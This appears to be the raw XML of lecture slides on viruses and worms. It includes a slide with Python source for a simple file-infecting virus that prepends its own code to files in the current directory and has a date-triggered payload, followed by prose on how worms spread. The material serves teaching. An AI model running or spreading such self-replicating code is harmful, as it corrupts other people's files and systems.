              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>annoying or disrupting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>the victim” </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Comic Sans MS"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 in Python (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8686800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> infect(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>filestoinfect</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virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.path.abspath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(__file__)) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> # name of myself</a:t>
            </a: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virusstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= "" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i,line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> in enumerate(virus):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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;=0 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> &lt;39: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virusstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+= line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virus.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>filestoinfect</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f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname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temp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>f.read</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f.close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f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>,"w")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f.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>virusstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> + temp)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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>f.close</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err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bomb():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if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>datetime.datetime.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>().month == 1 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>datetime.datetime.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>().day == 25: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"HAPPY BIRTHDAY CRANKLIN!" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>filestoinfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= search(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.path.abspath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("")) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>   # absolute path of CWD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>infect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>filestoinfect</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smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bomb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2353373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Worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>main difference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>between </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>worm is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>worm does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> need a host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>document, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0"/>
              <a:t>i.e.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>a worm does not need to attach itself to another program. In that sense, a worm is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>self-contained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> autonomous</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>On its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>own (being autonomous), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>a worm is able to send copies of itself to other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>over a network </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Therefore, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>whereas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>worm can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>harm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>network and consume network bandwidth, the damage caused </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>virus is mostly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>ote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>that a lot of people </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>terms ‘virus’ and ‘worm’ synonymously. That is particularly the case with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>vendors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anti-virus software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>. A commercial anti-virus program is supposed to catch both viruses and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285533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Mechanisms of Worms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Since, by definition, a worm is supposed to hop from machine to machine on its own, it needs to come equipped with considerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>networking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> support </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>With regard to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autonomous network hopping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>worms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>may hop from one machine to another by a variety of means </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell facilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, as provided by, say, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>rexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>., in Unix, to execute a command on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>machine. If the target machine can be compromised in this manner, the intruder could install a small bootstrap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>on the target machine that could bring in the rest of the malicious software </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cracking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>and logging in as a regular user on a remote machine. Password crackers can take advantage of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>people’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>tendency to keep their passwords as simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>possible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using buffer overflow vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>in networking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>software </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>In networking with sockets, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>is initiated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>client </a:t>
